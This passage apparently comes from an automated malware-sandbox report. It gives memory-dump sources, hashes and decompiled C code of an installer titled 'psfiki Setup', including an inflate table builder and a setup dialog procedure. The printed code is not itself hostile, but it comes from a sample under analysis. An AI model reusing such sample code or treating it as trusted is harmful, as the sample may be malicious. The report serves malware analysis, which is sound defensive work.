                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                          • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                                          • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                          • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000CF57, Relevance: .3, Instructions: 331COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction ID: d146f544c4d5cf28aed62a181ac7a0edd9bc0cb025ea2031d8961bd1d2e98751
                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction Fuzzy Hash: F3C1743220519309EB4DD77E847453FFAE29B926F131717AEE4B6CB1C9EE20C564D620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000CB3F, Relevance: .3, Instructions: 323COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction ID: 8f49d86cfcd63a9e28a291694487fbf7eb841b9f507b9c3a19b01359cf926182
                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction Fuzzy Hash: 6FC14E3220529709FB4D877DC47493FBAE2DB926F131717AEE4B6CB1D8EE20C5649620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040681A, Relevance: .3, Instructions: 300COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42cdf0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42cdf0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                          0x00406825
                                          0x0040682d
                                          0x00406831
                                          0x00406833
                                          0x00406836
                                          0x00406838
                                          0x00406838
                                          0x0040683a
                                          0x00406841
                                          0x00406843
                                          0x00406843
                                          0x00406849
                                          0x0040685e
                                          0x00406866
                                          0x00406868
                                          0x0040686a
                                          0x0040686d
                                          0x0040686e
                                          0x0040686e
                                          0x00406874
                                          0x00000000
                                          0x00000000
                                          0x00406876
                                          0x00406879
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406879
                                          0x0040687d
                                          0x00406880
                                          0x00406882
                                          0x00406882
                                          0x00406885
                                          0x0040688b
                                          0x0040688c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040688c
                                          0x00406891
                                          0x00406894
                                          0x00406896
                                          0x00406896
                                          0x0040689c
                                          0x0040689e
                                          0x004068af
                                          0x004068a2
                                          0x004068a6
                                          0x00406b4b
                                          0x00000000
                                          0x00406b4b
                                          0x004068ac
                                          0x004068ad
                                          0x004068ad
                                          0x004068b5
                                          0x004068b8
                                          0x004068bc
                                          0x004068be
                                          0x004068c0
                                          0x004068c3
                                          0x00000000
                                          0x00000000
                                          0x004068cb
                                          0x004068d1
                                          0x004068d3
                                          0x004068d5
                                          0x004068d6
                                          0x004068eb
                                          0x004068eb
                                          0x004068ee
                                          0x004068f0
                                          0x004068f0
                                          0x004068f2
                                          0x004068f7
                                          0x004068f9
                                          0x00406900
                                          0x00406902
                                          0x0040690a
                                          0x0040690a
                                          0x0040690c
                                          0x0040690d
                                          0x0040691c
                                          0x00406920
                                          0x00406924
                                          0x00406927
                                          0x0040692a
                                          0x0040692f
                                          0x00406932
                                          0x00406938
                                          0x0040693f
                                          0x00406945
                                          0x00406b3e
                                          0x00406b3e
                                          0x00406b43
                                          0x00406b52
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406b43
                                          0x00406952
                                          0x00406955
                                          0x00406958
                                          0x0040695b
                                          0x0040695f
                                          0x00000000
                                          0x00000000
                                          0x0040696a
                                          0x0040696d
                                          0x0040696e
                                          0x00406970
                                          0x00406976
                                          0x00406979
                                          0x00000000
                                          0x00000000
                                          0x0040697f
                                          0x00406980
                                          0x00406983
                                          0x00406986
                                          0x00406989
                                          0x0040698f
                                          0x00406991
                                          0x00406991
                                          0x00406999
                                          0x0040699d
                                          0x004069a2
                                          0x004069c7
                                          0x004069cd
                                          0x004069cf
                                          0x004069d1
                                          0x004069d4
                                          0x004069dd
                                          0x00000000
                                          0x00000000
                                          0x004069a4
                                          0x004069a4
                                          0x004069ad
                                          0x004069b1
                                          0x00000000
                                          0x00000000
                                          0x004069c2
                                          0x004069c2
                                          0x004069c5
                                          0x00000000
                                          0x00000000
                                          0x004069b5
                                          0x004069b8
                                          0x004069ba
                                          0x004069be
                                          0x00000000
                                          0x00000000
                                          0x004069c0
                                          0x004069c0
                                          0x00000000
                                          0x004069c2
                                          0x004069e6
                                          0x004069ec
                                          0x004069f6
                                          0x004069f8
                                          0x004069fd
                                          0x004069ff
                                          0x00406a35
                                          0x00406a01
                                          0x00406a01
                                          0x00406a04
                                          0x00406a07
                                          0x00406a11
                                          0x00406a14
                                          0x00406a1b
                                          0x00406a26
                                          0x00406a2d
                                          0x00406a2d
                                          0x00406a37
                                          0x00406a3a
                                          0x00406a3c
                                          0x00406a42
                                          0x00406a42
                                          0x00406a4b
                                          0x00406a4e
                                          0x00406a53
                                          0x00406a62
                                          0x00406a6a
                                          0x00406a6f
                                          0x00406a93
                                          0x00406a9b
                                          0x00406a9f
                                          0x00406aa5
                                          0x00406a71
                                          0x00406a7f
                                          0x00406a82
                                          0x00406a88
                                          0x00406a88
                                          0x00406aa9
                                          0x00406a64
                                          0x00406a64
                                          0x00406a64
                                          0x00406aba
                                          0x00406abe
                                          0x00406aca
                                          0x00406ac5
                                          0x00406ac8
                                          0x00406ac8
                                          0x00406ad2
                                          0x00406ad7
                                          0x00406adf
                                          0x00406adb
                                          0x00406add
                                          0x00406add
                                          0x00406ae5
                                          0x00406ae7
                                          0x00406aee
                                          0x00406af8
                                          0x00406b02
                                          0x00406b1e
                                          0x00406b22
                                          0x00406967
                                          0x0040696d
                                          0x0040696e
                                          0x00406970
                                          0x00406976
                                          0x00406979
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406979
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406b04
                                          0x00406b04
                                          0x00406b04
                                          0x00406b09
                                          0x00406b12
                                          0x00406b1b
                                          0x00000000
                                          0x00406b1b
                                          0x00406b28
                                          0x00406b28
                                          0x00406b2b
                                          0x00406b32
                                          0x00406b35
                                          0x00000000
                                          0x00406958
                                          0x004068d8
                                          0x004068da
                                          0x004068da
                                          0x004068de
                                          0x004068e1
                                          0x004068e2
                                          0x004068e2
                                          0x00000000
                                          0x004068da
                                          0x0040684e
                                          0x00406854
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                          • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                                          • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                          • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040380A, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x429fbc = _t35;
					if(_t115 == 0x110) {
						 *0x42eb68 = _t125;
						 *0x429fd0 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428f98 = _t91;
						E00403CDD(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e348);
						 *0x42e32c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x429fbc = 1;
					}
					_t122 =  *0x40919c; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42eb80;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403D29(0x40b);
						while(1) {
							_t37 =  *0x429fbc;
							 *0x40919c =  *0x40919c + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x40919c; // 0xffffffff
							__eflags = _t39 -  *0x42eb84; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e32c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42eb84; // 0x2
							__eflags =  *0x40919c - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403CDD(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ebec - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403CFF(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428f98, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ebec - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x429fd0);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428f98);
							}
							E00403D12();
							E0040592B(0x429fd8, "psfiki Setup");
							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x429fd8);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e338);
									 *0x4297a8 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e338 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403CDD(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e32c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e338, 8);
									E00403D29(0x405);
									goto L58;
								}
								__eflags =  *0x42ebec - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42ebe0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e338);
						 *0x42eb68 = _t133;
						EndDialog(_t125,  *0x4293a0);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e338, 0x40f, 0, 1);
						__eflags =  *0x42e32c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403D44(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e338, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ebec - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x4293a0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403CB6();
											goto L26;
										}
										E0040140B(_t127);
										 *0x4293a0 = _t127;
										goto L21;
									}
									__eflags =  *0x40919c - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e338);
						 *0x42e338 = _a12;
						L58:
						if( *0x42afd8 == _t133) {
							_t142 =  *0x42e338 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42afd8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                          0x00403813
                                          0x0040381c
                                          0x0040395d
                                          0x00403961
                                          0x00403965
                                          0x00403967
                                          0x0040396c
                                          0x00403977
                                          0x00403982
                                          0x00403987
                                          0x00403989
                                          0x0040398b
                                          0x0040398e
                                          0x00403993
                                          0x004039a1
                                          0x004039ae
                                          0x004039b5
                                          0x004039b5
                                          0x004039b6
                                          0x004039b6
                                          0x004039bb
                                          0x004039c1
                                          0x004039c8
                                          0x004039ce
                                          0x004039d0
                                          0x00403a10
                                          0x00403a15
                                          0x00403a1a
                                          0x00403a1a
                                          0x00403a1f
                                          0x00403a28
                                          0x00403a2a
                                          0x00403a2f
                                          0x00403a35
                                          0x00403a39
                                          0x00403a39
                                          0x00403a3e
                                          0x00403a44
                                          0x00000000
                                          0x00000000
                                          0x00403a4a
                                          0x00403a4f
                                          0x00403a55
                                          0x00000000
                                          0x00000000
                                          0x00403a5e
                                          0x00403a66
                                          0x00403a6b
                                          0x00403a6e
                                          0x00403a74
                                          0x00403a79
                                          0x00403a7c
                                          0x00403a82
                                          0x00403a87
                                          0x00403a8a
                                          0x00403a90
                                          0x00403a98
                                          0x00403a9e
                                          0x00403aa4
                                          0x00403aa8
                                          0x00403aaf
                                          0x00403aaf
                                          0x00403aaf
                                          0x00403ab9
                                          0x00403acb
                                          0x00403ad7
                                          0x00403adc
                                          0x00403ae6
                                          0x00403aec
                                          0x00403aee
                                          0x00403af3
                                          0x00403af0
                                          0x00403af0
                                          0x00403af0
                                          0x00403b03
                                          0x00403b1b
                                          0x00403b1d
                                          0x00403b23
                                          0x00403b38
                                          0x00403b25
                                          0x00403b2e
                                          0x00403b30
                                          0x00403b30
                                          0x00403b3e
                                          0x00403b4e
                                          0x00403b5f
                                          0x00403b66
                                          0x00403b6c
                                          0x00403b70
                                          0x00403b75
                                          0x00403b77
                                          0x00000000
                                          0x00403b7d
                                          0x00403b7d
                                          0x00403b7f
                                          0x00000000
                                          0x00000000
                                          0x00403b85
                                          0x00403b89
                                          0x00403bae
                                          0x00403bb4
                                          0x00403bba
                                          0x00403bbc
                                          0x00000000
                                          0x00000000
                                          0x00403be2
                                          0x00403be8
                                          0x00403bea
                                          0x00403bef
                                          0x00000000
                                          0x00000000
                                          0x00403bf5
                                          0x00403bf8
                                          0x00403bfb
                                          0x00403c12
                                          0x00403c1e
                                          0x00403c37
                                          0x00403c3d
                                          0x00403c41
                                          0x00403c46
                                          0x00403c4c
                                          0x00000000
                                          0x00000000
                                          0x00403c56
                                          0x00403c61
                                          0x00000000
                                          0x00403c61
                                          0x00403b8b
                                          0x00403b91
                                          0x00000000
                                          0x00000000
                                          0x00403b97
                                          0x00403b9d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403ba3
                                          0x00403b77
                                          0x00403c6e
                                          0x00403c7a
                                          0x00403c81
                                          0x00000000
                                          0x004039d2
                                          0x004039d2
                                          0x004039d5
                                          0x00403a08
                                          0x00403a08
                                          0x00403a0a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403a0a
                                          0x004039d7
                                          0x004039db
                                          0x004039e0
                                          0x004039e2
                                          0x00000000
                                          0x00000000
                                          0x004039f2
                                          0x004039fa
                                          0x00000000
                                          0x00403a00
                                          0x0040382e
                                          0x0040382e
                                          0x00403832
                                          0x00403837
                                          0x00403846
                                          0x00403846
                                          0x0040384f
                                          0x00403858
                                          0x00403863
                                          0x00403863
                                          0x0040386f
                                          0x0040388b
                                          0x0040388e
                                          0x004038a1
                                          0x004038a7
                                          0x0040394a
                                          0x00000000
                                          0x00403953
                                          0x004038ad
                                          0x004038ba
                                          0x004038bc
                                          0x004038be
                                          0x004038dd
                                          0x004038dd
                                          0x004038e0
                                          0x004038e5
                                          0x004038e8
                                          0x004038f8
                                          0x004038f9
                                          0x004038fb
                                          0x00403931
                                          0x00403944
                                          0x00000000
                                          0x00403944
                                          0x004038fd
                                          0x00403903
                                          0x0040391c
                                          0x00403921
